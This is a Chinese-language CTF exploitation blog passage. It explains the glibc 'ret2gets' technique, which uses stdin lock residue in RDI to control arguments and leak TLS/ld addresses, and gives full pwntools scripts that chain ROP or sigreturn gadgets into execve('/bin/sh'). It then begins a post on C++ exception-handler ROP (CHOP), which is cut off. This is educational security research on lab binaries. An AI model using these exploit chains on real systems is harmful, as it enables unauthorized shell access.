  char *_IO_write_base; /* Start of put area. */
  char *_IO_write_ptr; /* Current put pointer. */
  char *_IO_write_end; /* End of put area. */
  char *_IO_buf_base; /* Start of reserve area. */
  char *_IO_buf_end; /* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2:24;
  /* Fallback buffer to use when malloc fails to allocate one.  */
  char _short_backupbuf[1];
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

typedef struct {
  int lock;
  int cnt;
  void *owner;
} _IO_lock_t;

:::important 这个 _lock 指针指向的就是我们 rdi 中的 _IO_stdfile_0_lock，先记住这点，下面有用。 :::

_IO_acquire_lock / _IO_release_lock

#define _IO_USER_LOCK 0x8000

# ifdef __EXCEPTIONS
#  define _IO_acquire_lock(_fp) \
  do {                                                                    \
    FILE *_IO_acquire_lock_file                                           \
 __attribute__((cleanup (_IO_acquire_lock_fct)))                          \
 = (_fp);                                                                 \
    _IO_flockfile (_IO_acquire_lock_file);
# else
#  define _IO_acquire_lock(_fp) _IO_acquire_lock_needs_exceptions_enabled
# endif
# define _IO_release_lock(_fp) ; } while (0)

__attribute__((cleanup (_IO_acquire_lock_fct))) = (_fp); 主要就是将 cleanup 函数 _IO_acquire_lock_fct 和 _fp 进行一个绑定。使得在 do { ... } while (0) 作用域结束后自动对 _fp 调用 _IO_acquire_lock_fct 进行 cleanup 。

static inline void
__attribute__ ((__always_inline__))
_IO_acquire_lock_fct (FILE **p)
{
  FILE *fp = *p;
  if ((fp->_flags & _IO_USER_LOCK) == 0)
    _IO_funlockfile (fp);
}

_IO_USER_LOCK 标志是用来记录当前 I/O 流是否处于由用户显式请求的锁定状态。

_IO_acquire_lock_fct 这个 cleanup 函数主要是，若 FILE 没有设置 _IO_USER_LOCK 标志，就对该文件解锁。

我们发现这加锁解锁层层封装了好几个宏：

# define _IO_flockfile(_fp) \
  if (((_fp)->_flags & _IO_USER_LOCK) == 0) _IO_lock_lock (*(_fp)->_lock)
# define _IO_funlockfile(_fp) \
  if (((_fp)->_flags & _IO_USER_LOCK) == 0) _IO_lock_unlock (*(_fp)->_lock)

如果用户没有显示请求上锁/解锁，就调用后面的函数，否则说明用户之前已经调用过 flockfile 或者 funlockfile，这个 if 将确保它不会重复上锁/解锁。

这还没完，真正执行最后上锁解锁操作的是下面的 _IO_lock_lock 和 _IO_lock_unlock。

_IO_lock_lock / _IO_lock_unlock

/* Initializers for lock.  */
#define LLL_LOCK_INITIALIZER (0)
#define LLL_LOCK_INITIALIZER_LOCKED (1)

#define _IO_lock_lock(_name) \
  do {                                               \
    void *__self = THREAD_SELF;                      \
    if (SINGLE_THREAD_P && (_name).owner == NULL)    \
      {                                              \
 (_name).lock = LLL_LOCK_INITIALIZER_LOCKED;         \
 (_name).owner = __self;                             \
      }                                              \
    else if ((_name).owner != __self)                \
      {                                              \
 lll_lock ((_name).lock, LLL_PRIVATE);               \
 (_name).owner = __self;                             \
      }                                              \
    else                                             \
      ++(_name).cnt;                                 \
  } while (0)

#define _IO_lock_unlock(_name) \
  do {                                               \
    if (SINGLE_THREAD_P && (_name).cnt == 0)         \
      {                                              \
 (_name).owner = NULL;                               \
 (_name).lock = 0;                                   \
      }                                              \
    else if ((_name).cnt == 0)                       \
      {                                              \
 (_name).owner = NULL;                               \
 lll_unlock ((_name).lock, LLL_PRIVATE);             \
      }                                              \
    else                                             \
      --(_name).cnt;                                 \
  } while (0)

这里的 _name 即 _IO_stdfile_0_lock。owner 字段存储当前持有锁的线程的 TLS 结构体地址。

加锁时，先获取当前线程 TLS 结构体地址，即 THREAD_SELF，然后分三种情况：

单线程优化：如果是单线程环境并且锁没被占用，则直接把锁设为 LOCKED，并设置 owner
多线程竞争：如果 (_name).owner != __self，即锁不属于当前线程，是其他线程持有，则调用 lll_lock()，阻塞直到锁可用后再尝试获取锁
递归加锁：如果锁属于当前线程，说明同一线程再次加锁，则增加计数器 cnt

:::tip 有关 lll_lock() 的作用，简单来说就是：无论锁当前是否空闲，我调用它，都能保证最终自己持有这个锁（要么立刻成功，要么阻塞直到可用）。

因为它的实现是对 futex (fast userspace mutex) 的封装，futex 的特性为：

无竞争路径：如果锁的内部状态是「未锁」，原子操作直接把它设为「已锁」，立即返回，非常快
有竞争路径：如果发现锁已被其它线程持有，就会进入 futex 系统调用，把自己挂到等待队列上，一旦对方解锁唤醒，就可以立即获取到锁

:::

释放锁的过程也很好理解：

单线程优化：如果 cnt 为 0（没有递归加锁），直接清空 owner，把锁标记为解锁
多线程情况：如果 cnt 为 0，清空 owner，并调用 lll_unlock() 释放 futex 锁
递归解锁：如果 cnt > 0，说明是递归锁的一层，只会将 cnt 减一，不真正释放锁

_IO_stdfile_0_lock in RDI ?

现在我们研究研究为啥 rdi 是 _IO_stdfile_0_lock 而不是别的。这里如果你使用源码级调试的话会看得更清楚一点。

根据上面的分析，我们知道 gets 在最后返回的时候会调用 _IO_release_lock (stdin) 来释放锁。如果你还没忘记的话，我们定义 _IO_acquire_lock (_fp) 的时候设置了 cleanup 函数，将 _fp 和 _IO_acquire_lock_fct 绑定，一旦离开此作用域，就会自动调用 _IO_acquire_lock_fct (_fp)，而它内部又是通过 _IO_funlockfile (fp) 调用了 _IO_lock_unlock (*(_fp)->_lock)，完成这一整个释放锁的流程并返回。而最后调用的 _IO_lock_unlock (*(_fp)->_lock) 使用的参数正是 _IO_stdfile_0_lock。

很关键的一点就是，_IO_release_lock(_fp) 也属于这个定义域，所以如果 _IO_release_lock(_fp) 返回了，也会自动调用上面设置的 cleanup 函数。

观察上面的调试输出，我们执行完 _IO_lock_unlock (*(_fp)->_lock) 后就直接返回到了 main，并且执行完这个函数后在 epilogue 阶段并没有恢复 rdi，也就是说 rdi 会沿用最后一个被调用的函数的 rdi，即 _IO_stdfile_0_lock 这个值。

<em> 呼呼～长舒一口气～写到这里已经凌晨三点了，因为白天上了一天课（简直是虚度光阴……），只能晚上科研力。好在明天课免修了，我可以一直睡到早上十点半再起来，七个小时，应该也够我睡的了 LOL

要我说，这才是大学生活该有的样子啊，哈哈哈～ </em>

至此，我们已经搞清楚了整个流程，下面就研究如何利用吧～

Attack

Controlling RDI

由于我们再次调用 gets 就会向 rdi，也就是 _IO_stdfile_0_lock 中写入数据，那如果我们将 /bin/sh 写在这里，那 rdi 就变成了指向 /bin/sh 的字符串指针，效果与 pop rdi; ret 相当。此时如果我们可以调用 system 的话，就能 getshell 了。

根据上面的分析，我们这种 gets 的情况最后必然会通过 ((_fp)->_flags & _IO_USER_LOCK) == 0 检测，进而调用 _IO_lock_unlock (*(_fp)->_lock)，所以我们只需要注意不要让这个函数内部执行的东西妨碍我们的利用即可。

我们发现，只要执行 _IO_lock_unlock 时 cnt 不为 0 就可以不带什么 side effect 的安全地返回，不过它会将 cnt 减一，如果我们直接传入 /bin/sh 的话，默认已经覆盖到了 cnt，但是由于减一会破坏我们的字符串，所以我们需要手动给那个位置的值加一。

payload = flat(
    b"A" * 0x28,
    elf.plt["gets"],
)
target.sendlineafter(b"ROP me if you can!", payload)

payload = flat(
    b"/bin",
    p8(u8(b"/") + 1),
    b"sh",
)
target.sendline(payload)

从上图我们可以看到，rdi 已经变成了我们的预期值，尽管会触发 SIGSEGV，但这也是必然的，毕竟我们还没有写入后续的 ROP Chain 。

:::tip 如果我们不手动将 _IO_stdfile_0_lock 的内容还原，/bin/sh 就会一直存在在那里，所以后续调用 gets 我们都会再次令 rdi 指向 /bin/sh。而执行过程中的加锁虽然会增加 cnt，但是执行完也会相应的进行解锁，减去 cnt，所以对我们写入的字符串不会产生什么影响。 :::

Leaking libc / ld

解决了控制 rdi 的问题后，接下来介绍几种泄漏 libc / ld 的方法。

printf

如果我们可以调用 printf，那就可以用和上面一样的方法，通过 %?$p 然后返回到 printf 的方式泄漏任意地址。

这里就不做单独的演示了，相信实践起来还是很简单的。

puts

倘若没有 printf，只有 puts 的话，我们就可以通过输出 _lock.owner 的方式泄漏 TLS 的值，它相对于 ld 有着一个固定偏移，但是和 libc 之间没有固定偏移。

:::caution 所以下面 ret2gets 中写的是有问题的，作者认为它和 libc 之间存在固定偏移，但很显然 TLS 地址不属于 libc 的范围，mmap 的映射区和 libc 之间有个较大的可映射空间，每次都会映射到这个空间内的随机位置。不过如果我们计算它与 ld 之间的偏移，会发现这两者之间却存在固定偏移。

那 ld 中是否存在可用的 gadgets 呢？我看了下 glibc 2.41 的 ld，发现里面几乎提供了控制每一个参数的 gadgets，甚至还有 syscall，尽管没有 onegadgets，但是我相信让你用这些 gadgets 手动构造一个 execve 启 shell 绝对是手拿把掐的 xD

当然，构造 sigreturn 就可以控制所有寄存器了，不是吗？感觉又掌握了一个堪比核武器的 trick LOL :::

这里我只对高版本 glibc 使用 puts 泄漏 TLS 地址做一个总结，低版本也能用这个方法泄漏，但是没必要。不过我相信你学会高版本中泄漏 TLS 的方法后对于低版本怎么操作一定也没有问题。

首先回顾一下高版本 glibc 中上锁/解锁的代码。当我们首次调用 gets 的时候，会先进行一个上锁的操作，由于我们现在是单线程程序，且 owner 为 NULL，所以肯定会进入 SINGLE_THREAD_P && (_name).owner == NULL 检测。这就会将锁设置为 LLL_LOCK_INITIALIZER_LOCKED，即上锁状态，然后设置 owner 为当前 TLS 结构体地址。

之后 gets 将要返回时会执行解锁函数，按照现在的状态来看的话，我们必定会进入 SINGLE_THREAD_P && (_name).cnt == 0 中，这会将 owner 和 lock 都清空。那就没法用 puts 泄漏 owner 保存的 TLS 结构体地址了。

因此我们第一次调用 gets 可以令 rdi 指向 _IO_stdfile_0_lock，接着再次调用 gets，就可以向 rdi 写入数据，写什么呢？肯定是要写能绕过检测的内容咯。

此时我们不需要管上锁逻辑，只要关注解锁的时候，不要让它把 owner 清空即可，那首先就应该令 (_name).cnt == 0 不成立，将 cnt 填充为四字节垃圾值，此时 else if 也不会进入，而是进入 else 减少 cnt 的值。

PS: Reference 中那篇文章这里说要绕过 _IO_lock_lock，我怀疑作者怕是犯糊涂了，事实上我们这里根本不需要关心如何绕过上锁函数的逻辑……

可以看下图，是第二次 gets 后将 cnt 填充为垃圾字节后的结果，此时 owner 还持有着一个地址，但并不是 TLS 地址（虽然但是，这并不妨碍我们接下来泄漏 TLS）：

之后它会将 cnt 减一，就变成了 0x4141414000000000。

但是此时我们还不能直接通过 puts 连带泄漏 TLS 地址，因为这里面包含了四个空字节。解决方法是再调用一次 gets，覆盖 lock 的值即可。同时，由于再次调用 gets 会再次执行上锁函数，而它将发现 (_name).owner != __self，进入 else if 分支，将 owner 重置为正确的 TLS 地址。

你可能会想，为什么不直接在第二次 gets 的时候顺便覆盖 lock 呢？这是因为 gets 会在字符串结束后写入 \x00，破坏 TLS 结构体地址，所以我们需要分多次慢慢来。

那么我们输入四个 junk value padding 掉 lock 就会导致 cnt 低位变成 \x00，如下图：

但是紧接着就会将 cnt 自减，\x00 变成 \xff：

而此时，我们发现已经不存在截断 puts 输出的空字节了，此时我们可以直接通过 puts 输出 _IO_stdfile_0_lock，这会连带泄漏 TLS 结构体的地址，减掉它与 ld 的固定偏移就拿到 ld 基地址了。同时，由于 ld 中存在大量 gadgets，我们可以尽情抒写 ROP 狂想曲 LOL

Exploit

Manually call execve

#!/usr/bin/env python3

from pwn import (
    ELF,
    ROP,
    args,
    context,
    flat,
    p32,
    process,
    raw_input,
    remote,
    u64,
)


FILE = "./vuln_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
ld = ELF("./ld-linux-x86-64.so.2")
rop = ROP(ld)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"A" * 0x28,
        elf.plt["gets"],
        elf.plt["gets"],
        elf.plt["puts"],
        elf.sym["main"],
    )
    raw_input("DEBUG")
    target.sendlineafter(b"ROP me if you can!", payload)

    payload = flat(
        p32(0x0),  # lock
        b"A" * 0x4,  # cnt
    )
    target.sendline(payload)
    target.sendline(b"BBBB")

    target.recvline()
    tls = u64(target.recvline().strip()[8:].ljust(0x8, b"\x00"))
    ld = tls + 0xC8C0
    target.success(f"tls: {hex(tls)}")
    target.success(f"ld: {hex(ld)}")

    gets = 0x40114D
    payload = flat(
        b"A" * 0x20,
        elf.bss() + 0xF00,
        gets,
    )
    target.sendlineafter(b"ROP me if you can!", payload)

    payload = flat(
        b"A" * 0x20,
        b"/bin/sh\x00",
        ld + rop.find_gadget(["pop rdi", "pop rbp", "ret"])[0],
        elf.bss() + 0xF00,
        0x0,
        ld + rop.find_gadget(["pop rsi", "pop rbp", "ret"])[0],
        0x0,
        0x404F60,
        ld + rop.find_gadget(["pop rdx", "leave", "ret"])[0],
        0x0,
        ld + rop.find_gadget(["pop rax", "ret"])[0],
        0x3B,
        ld + rop.find_gadget(["syscall", "ret"])[0],
    )
    target.sendline(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Using sigreturn

#!/usr/bin/env python3

from pwn import (
    ELF,
    ROP,
    SigreturnFrame,
    args,
    context,
    flat,
    p32,
    process,
    raw_input,
    remote,
    u64,
)


FILE = "./vuln_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
ld = ELF("./ld-linux-x86-64.so.2")
rop = ROP(ld)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"A" * 0x28,
        elf.plt["gets"],
        elf.plt["gets"],
        elf.plt["puts"],
        elf.sym["main"],
    )
    raw_input("DEBUG")
    target.sendlineafter(b"ROP me if you can!", payload)

    payload = flat(
        p32(0x0),  # lock
        b"A" * 0x4,  # cnt
    )
    target.sendline(payload)
    target.sendline(b"BBBB")

    target.recvline()
    tls = u64(target.recvline().strip()[8:].ljust(0x8, b"\x00"))
    ld = tls + 0xC8C0
    target.success(f"tls: {hex(tls)}")
    target.success(f"ld: {hex(ld)}")

    gets = 0x40114D
    payload = flat(
        b"A" * 0x20,
        elf.bss(),
        gets,
    )
    target.sendlineafter(b"ROP me if you can!", payload)

    frame = SigreturnFrame()
    frame.rax = 0x3B
    frame.rdi = elf.bss()
    frame.rsi = 0x0
    frame.rdx = 0x0
    frame.rip = ld + rop.find_gadget(["syscall", "ret"])[0]

    payload = flat(
        b"A" * 0x20,
        b"/bin/sh\x00",
        ld + rop.find_gadget(["pop rax", "ret"])[0],
        0xF,
        ld + rop.find_gadget(["syscall", "ret"])[0],
        bytes(frame),
    )
    target.sendline(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Digging Deeper

RDI != _IO_stdfile_0_lock

// gcc -Wall vuln.c -o vuln -no-pie -fno-stack-protector -std=c99

#include <stdio.h>

int main() {
  char buf[0x20];
  puts("ROP me if you can!");
  gets(buf);
  puts("No lock for you ;)");

  return 0;
}

Case 1: RDI is Writable

上面这个程序执行 puts 后 rdi 就不会是 _IO_stdfile_0_lock 了，取而代之的是 _IO_stdfile_1_lock，但是很好解决啊，我们输入大小又没限制，直接先返回到一次 gets 重新令 rdi 等于 _IO_stdfile_0_lock 就好了。

:::warning 唯一需要注意的是，返回到 gets 的话，rdi 必须是可写内存地址，否则会出错。 :::

Case 2: RDI is Readonly

如果 rdi 是只读地址，我们就不能直接使用 gets 了。但是我们可以先使用 puts，这将返回给 rdi _IO_stdfile_1_lock，然后就可以使用和上面类似的方法继续构造 ROP Chain 。

Case 3: RDI == NULL

此时大多数 IO 函数都不可用了，不过还是存在例外。

printf / scanf

printf 的定义如下：

int
__printf (const char *format, ...)
{
  va_list arg;
  int done;

  va_start (arg, format);
  done = __vfprintf_internal (stdout, format, arg, 0);
  va_end (arg);

  return done;
}

#undef _IO_printf
ldbl_strong_alias (__printf, printf);
ldbl_strong_alias (__printf, _IO_printf);

va_list 用于声明一个保存当前可变参数列表的指针；va_start (arg, format) 用于告诉编译器可变参数从 format 之后开始，它的第二个参数必须是函数参数表里，最后一个已知的固定参数，比如 printf 中就是 format；va_end 会做一些清理工作，结束访问。

注意到传入 __vfprintf_internal (stdout, format, arg, 0) 的 rdi 为 stdout。

/* The FILE-based function.  */
int
vfprintf (FILE *s, const CHAR_T *format, va_list ap, unsigned int mode_flags)
{
  /* Orient the stream.  */
#ifdef ORIENT
  ORIENT;
#endif

  /* Sanity check of arguments.  */
  ARGCHECK (s, format);

#ifdef ORIENT
  /* Check for correct orientation.  */
  if (_IO_vtable_offset (s) == 0
      && _IO_fwide (s, sizeof (CHAR_T) == 1 ? -1 : 1)
      != (sizeof (CHAR_T) == 1 ? -1 : 1))
    /* The stream is already oriented otherwise.  */
    return EOF;
#endif

  if (!_IO_need_lock (s))
    {
      struct Xprintf (buffer_to_file) wrap;
      Xprintf (buffer_to_file_init) (&wrap, s);
      Xprintf_buffer (&wrap.base, format, ap, mode_flags);
      return Xprintf (buffer_to_file_done) (&wrap);
    }

  int done;

  /* Lock stream.  */
  _IO_cleanup_region_start ((void (*) (void *)) &_IO_funlockfile, s);
  _IO_flockfile (s);

  /* Set up the wrapping buffer.  */
  struct Xprintf (buffer_to_file) wrap;
  Xprintf (buffer_to_file_init) (&wrap, s);

  /* Perform the printing operation on the buffer.  */
  Xprintf_buffer (&wrap.base, format, ap, mode_flags);
  done = Xprintf (buffer_to_file_done) (&wrap);

  /* Unlock the stream.  */
  _IO_funlockfile (s);
  _IO_cleanup_region_end (0);

  return done;
}

我们跟进到 ARGCHECK 后发现，如果 Format == NULL 它就会让 printf 提前返回，那我们调用 __vfprintf_internal 时传入的 rdi 会不会继续残留在原地呢？

#define ARGCHECK(S, Format) \
  do                                                     \
    {                                                    \
      /* Check file argument for consistence.  */        \
      CHECK_FILE (S, -1);                                \
      if (S->_flags & _IO_NO_WRITES)                     \
       {                                                 \
  S->_flags |= _IO_ERR_SEEN;                             \
  __set_errno (EBADF);                                   \
  return -1;                                             \
       }                                                 \
      if (Format == NULL)                                \
       {                                                 \
  __set_errno (EINVAL);                                  \
  return -1;                                             \
       }                                                 \
    } while (0)

// gcc -Wall vuln.c -o vuln -no-pie -fno-stack-protector -std=c99

#include <stdio.h>

int main() {
  printf(NULL);

  return 0;
}

没毛病，rdi 的值还残留着 _IO_2_1_stdout_，成功令它变成可写地址，那现在就可以像上面一样使用 gets 了。

据说这里能用 FSOP 进行 leak，不过我还没学过，暂时先把参考链接放上来，以后有时间了再研究研究：

另外，由于 scanf 和 printf 类似，就不贴代码了，可以试试 scanf(NULL)，rdi 应该会保留 _IO_2_1_stdin_。

fflush

还有一个比较常见的接收 FILE 作为第一个参数的函数就是 fflush ，当 rdi 是 NULL 时，它会调用 _IO_flush_all 刷新所有 IO：

int _IO_fflush(FILE *fp) {
  if (fp == NULL)
    return _IO_flush_all();
  else {
    int result;
    CHECK_FILE(fp, EOF);
    _IO_acquire_lock(fp);
    result = _IO_SYNC(fp) ? EOF : 0;
    _IO_release_lock(fp);
    return result;
  }
}
libc_hidden_def(_IO_fflush)

weak_alias (_IO_fflush, fflush)
libc_hidden_weak (fflush)

#ifndef _IO_MTSAFE_IO
strong_alias (_IO_fflush, __fflush_unlocked)
libc_hidden_def (__fflush_unlocked)
weak_alias (_IO_fflush, fflush_unlocked)
libc_hidden_weak (fflush_unlocked)
#endif

int _IO_flush_all(void) {
  int result = 0;
  FILE *fp;

#ifdef _IO_MTSAFE_IO
  _IO_cleanup_region_start_noarg(flush_cleanup);
  _IO_lock_lock(list_all_lock);
#endif

  for (fp = (FILE *)_IO_list_all; fp != NULL; fp = fp->_chain) {
    run_fp = fp;
    _IO_flockfile(fp);

    if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base) ||
         (_IO_vtable_offset(fp) == 0 && fp->_mode > 0 &&
          (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base))) &&
        _IO_OVERFLOW(fp, EOF) == EOF)
      result = EOF;

    _IO_funlockfile(fp);
    run_fp = NULL;
  }

#ifdef _IO_MTSAFE_IO
  _IO_lock_unlock(list_all_lock);
  _IO_cleanup_region_end(0);
#endif

  return result;
}
libc_hidden_def(_IO_flush_all)

_IO_MTSAFE_IO 中的 MTSAFE 是 Multi Thread Safe 的意思，即多线程时 _IO_flush_all 最后执行的将是 _IO_cleanup_region_end (0)。

单线程时最后执行的是 _IO_funlockfile (fp)，这和我们之前看到的一样，rdi 肯定会残留锁。

我们主要关注 _IO_cleanup_region_end (0) 执行完 rdi 残留的是什么内容：

#define _IO_cleanup_region_end(_doit) \
  __libc_cleanup_region_end (_doit)

/* End critical region with cleanup.  */
#define __libc_cleanup_region_end(DOIT)  \
  if (_cleanup_start_doit)                    \
    __libc_cleanup_pop_restore (&_buffer);    \
  if (DOIT)                                   \
    _cleanup_routine (_buffer.__arg);         \
  } /* matches __libc_cleanup_region_start */

__libc_cleanup_pop_restore 接受 _buffer 地址作为参数，这是一个位于可写区域的地址，因此我们又成功得到了可写的 rdi，可以继续通过上面的 gets 完成接下来的 ROP 了。_cleanup_routine 也是同理。

Case 4: RDI is Junk

rand

rand 虽然不是 IO 函数，但它会在 rdi 内残留一个指向 unsafe_state 结构体的指针，适用于各种版本的 libc 。

long int __random(void) {
  int32_t retval;
  __libc_lock_lock(lock);
  (void)__random_r(&unsafe_state, &retval);
  __libc_lock_unlock(lock);

  return retval;
}

weak_alias(__random, random)

getchar

理论上，getchar 是完美的。因为参数无关紧要，而且由于 IO 函数通常在最后才会解锁，所以它们会在 rdi 中残留一个锁（getchar 会返回 _IO_stdfile_0_lock_）。可惜的是，这里存在一个优化：_IO_need_lock 。

int getchar(void) {
  int result;
  if (!_IO_need_lock(stdin))
    return _IO_getc_unlocked(stdin);
  _IO_acquire_lock(stdin);
  result = _IO_getc_unlocked(stdin);
  _IO_release_lock(stdin);
  return result;
}

#ifndef _IO_MTSAFE_IO
#undef getchar_unlocked
weak_alias(getchar, getchar_unlocked)
#endif

如果 ((_fp)->_flags2 & _IO_FLAGS2_NEED_LOCK) != 0，则说明需要加锁。

#define _IO_need_lock(_fp) \
  (((_fp)->_flags2 & _IO_FLAGS2_NEED_LOCK) != 0)

否则会进入 if，执行 _IO_getc_unlocked，发现执行的过程中还会调用别的函数，最后执行完并没有在 rdi 中残留什么有用的东西。

此外，根据引用我们推测，下面这些函数可能也存在同样的问题，不过还是需要自己去看代码才能确定。

下面是多线程版本，getchar 最终结束后 rdi 中会残留 _IO_stdfile_0_lock。

// gcc -Wall vuln.c -o vuln -no-pie -fno-stack-protector

#include <stdio.h>
#include <pthread.h>
#include <stdlib.h>

void *thread_function(void *arg);

int main() {
  pthread_t tids[2];
  int ret;

  ret = pthread_create(&tids[0], NULL, thread_function, (void *)1);
  if (ret != 0) {
    perror("pthread_create 1 failed");
    exit(EXIT_FAILURE);
  }

  ret = pthread_create(&tids[1], NULL, thread_function, (void *)2);
  if (ret != 0) {
    perror("pthread_create 2 failed");
    exit(EXIT_FAILURE);
  }

  pthread_join(tids[0], NULL);
  pthread_join(tids[1], NULL);

  return 0;
}

void *thread_function(void *arg) {
  getchar();

  pthread_exit(NULL);
}

当创建线程时，会调用 _IO_enable_locks，以确保所有新旧 IO 都设置了 _IO_FLAGS2_NEED_LOCK：

/* In a single-threaded process most stdio locks can be omitted.  After
   _IO_enable_locks is called, locks are not optimized away any more.
   It must be first called while the process is still single-threaded.

   This lock optimization can be disabled on a per-file basis by setting
   _IO_FLAGS2_NEED_LOCK, because a file can have user-defined callbacks
   or can be locked with flockfile and then a thread may be created
   between a lock and unlock, so omitting the lock is not valid.

   Here we have to make sure that the flag is set on all existing files
   and files created later.  */
void _IO_enable_locks(void) {
  _IO_ITER i;

  if (stdio_needs_locking)
    return;
  stdio_needs_locking = 1;
  for (i = _IO_iter_begin(); i != _IO_iter_end(); i = _IO_iter_next(i))
    _IO_iter_file(i)->_flags2 |= _IO_FLAGS2_NEED_LOCK;
}
libc_hidden_def(_IO_enable_locks)

有个想法是手动篡改 _IO_FLAGS2_NEED_LOCK 的值，不知道行不行，反正我还没遇到过，后面自己研究研究吧。

putchar

int putchar(int c) {
  int result;
  _IO_acquire_lock(stdout);
  result = _IO_putc_unlocked(c, stdout);
  _IO_release_lock(stdout);
  return result;
}

#if defined weak_alias && !defined _IO_MTSAFE_IO
#undef putchar_unlocked
weak_alias(putchar, putchar_unlocked)
#endif

这个函数就不管是不是多线程都会有残留了，不过也有限制，它要求 rdi 中必须是一个 char，或者 int 。不过感觉大多数情况下应该都不会有问题？不管了，等哪天有幸遇到再说对不对。

References

ret2gets

CHOP Suey: 端上异常处理的攻击盛宴

Tue, 23 Sep 2025 00:00:00 GMT

前言

今天刚复现完 2024 年羊城杯的 logger，一道简单的涉及 C++ 异常处理机制的缓冲区溢出题，感觉还挺有意思，了解了一下发现有一种专门针对于异常处理而发展出来的 ROP 手法，叫做 CHOP (Catch Handler Oriented Programming)，也有称其为 EOP (Exception Oriented Programming) 的，这里我就直接沿袭原论文中的命名了。我也是参考了多方博客学习的，现在打算自己写一篇，以增强个人理解。

~PS: 等有空了我想好好研读一下那篇论文，体验一下搞科研的感觉是什么样的（bushi~

:::important 本文将主要研究如何通过缓冲区溢出漏洞，利用 Linux 下的 C++ 异常处理机制，跳转到任意 catch 流，执行任意函数。但这并不意味着只有 C++ 中的异常处理机制可以被利用，至少我看原作者的演讲，好像说其它语言中的异常处理机制同样存在类似的问题。

暂时不打算对异常处理及 unwind 的过程做详细分析，只做简单介绍。日后有时间我会再单独写篇博客深入 unwind 的内部实现，剖析其原理。~所以这里就先占个坑/逃~ :::

因果之链：异常展开的轨迹

C++ 异常处理的编程思想

假设你略懂 C++ 中的 try catch 语法。不懂也没事，因为其它语言中异常的捕获与处理思想也类似。

以防有同学真的不了解异常处理的大致编程思想，我这里就简单提一嘴 C++ 中的 try catch 吧，~虽然我其实并不会 C++/逃~

一般对于可能发生异常的代码我们会使用 try 将其包裹；如果异常真的发生了，我们会通过 throw 将异常抛出，通知程序不要继续往下执行了，先去处理异常；而 throw 抛出的异常必定需要通过某种方式被识别吧？那就用到了 catch。catch 是有要求的，不是什么样的异常都可以进入同一个 catch 中。一般 throw 的时候会确定异常类型，比如是抛出了一个整形还是字符串，接着 catch 就会根据不同类型的异常而选择不同的 handler 用于处理；最终，处理完异常后程序可能会恢复执行（一般应该是从 catch 语句块之后接着执行）。

C++ 异常处理的基本流程

当 throw 发生时，程序大致会做这么几件事：

寻找合适的 catch
- 抛出异常后，从当前函数开始寻找匹配的 catch handler，找不到就将异常逐层往当前调用链的上层函数栈帧抛，直到找到能处理该类型异常的 catch handler，该过程被称为栈展开或栈回溯，即 Stack Unwindding 。如果最后回溯完整个调用链还是没找到合适的 handler，则调用 std::terminate()，其默认行为是使程序 abort 。
转移控制到 catch handler
- 一旦找到匹配的 handler，控制流跳转到对应的 catch 代码块开始执行
恢复执行
- 异常处理完毕后，系统会尝试恢复执行，通常是在异常被捕获的点之后继续执行

:::tip 目前我们只要知道 throw 会触发逐帧 unwind，最终跳转到合适的 catch handler 执行即可。我想上面这些简单的概念应该已经足够支撑我们理解为什么 handler 能当作 gadget 链接了，当然，前提是你已经学过了基本的 ROP 思想，我觉得这两者之间还是挺相似的，所以理解起来应该并不费劲。 :::

命运之刃：栈上的裂隙与挟持

:::important 下面代码使用 g++-9 编译测试，实测高版本在 ___cxa_allocate_exception 之后就检测了 canary，这对我们的利用会产生影响，因此这里使用 Ubuntu 20.04 (gcc-9 series) 及以下版本进行测试。 :::

// g++-9 -Wall vuln.cpp -o vuln -no-pie -fPIC

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

class foo {
public:
  char buf[0x10];

  foo() { printf("foo::foo() called\n"); }
  ~foo() { printf("foo::~foo() called\n"); }
};

void input();
void backdoor();

int main() {
  try {
    input();
    throw 1;
  } catch (int x) {
    printf("Int: %d\n", x);
  } catch (const char *s) {
    printf("String: %s\n", s);
  }

  printf("main() return\n");
  return 0;
}

void input() {
  foo tmp;

  printf("Enter your input: ");
  fflush(stdout);

  int size = 0x100;
  size_t len = read(0, tmp.buf, size);

  if (len > 0x10) {
    throw "Buffer overflow detected!";
  }

  printf("input() return\n");
}

void backdoor() {
  try {
    printf("We have never called this backdoor!\n");
  } catch (const char *s) {
    printf("Backdoor has catched the exception: %s\n", s);
    system("/bin/sh");
  }
}

先说结论，再调试。以当前示例程序为例，这里我粗略划分为三种情况：

没有发生异常，程序会顺着正常路径结束 input 调用
抛出异常，但是在当前函数被捕获，那么执行路径是：throw -> ___cxa_begin_catch -> executing handler -> ___cxa_end_catch -> resume after catch in input() -> destructor -> check canary -> ...
抛出异常，但是当前函数中不存在对应的 cactch，那么执行路径将变为：throw -> cleanup -> destructor -> __Unwind_Resume -> 此时进入上层栈帧查找是否含有匹配的 catch 块，没有的话继续执行 __Unwind_Resume 往上抛，直到找到为止。找到后，执行 catch handler (___cxa_begin_catch -> executing handler -> ___cxa_end_catch)，执行完后跳转到找到的那个函数的 catch 块后继续执行。若每一层都找不到，就像之前说的，会执行 std::terminate()，默认行为是 abort

对于测试在 input 中直接 catch 的情况，可以将 input 函数修改为如下：

void input() {
  foo tmp;

  printf("Enter your input: ");
  fflush(stdout);

  try {
    int size = 0x100;
    size_t len = read(0, tmp.buf, size);

    if (len > 0x10) {
      throw "Buffer overflow detected!";
    }
  } catch (const char *s) {
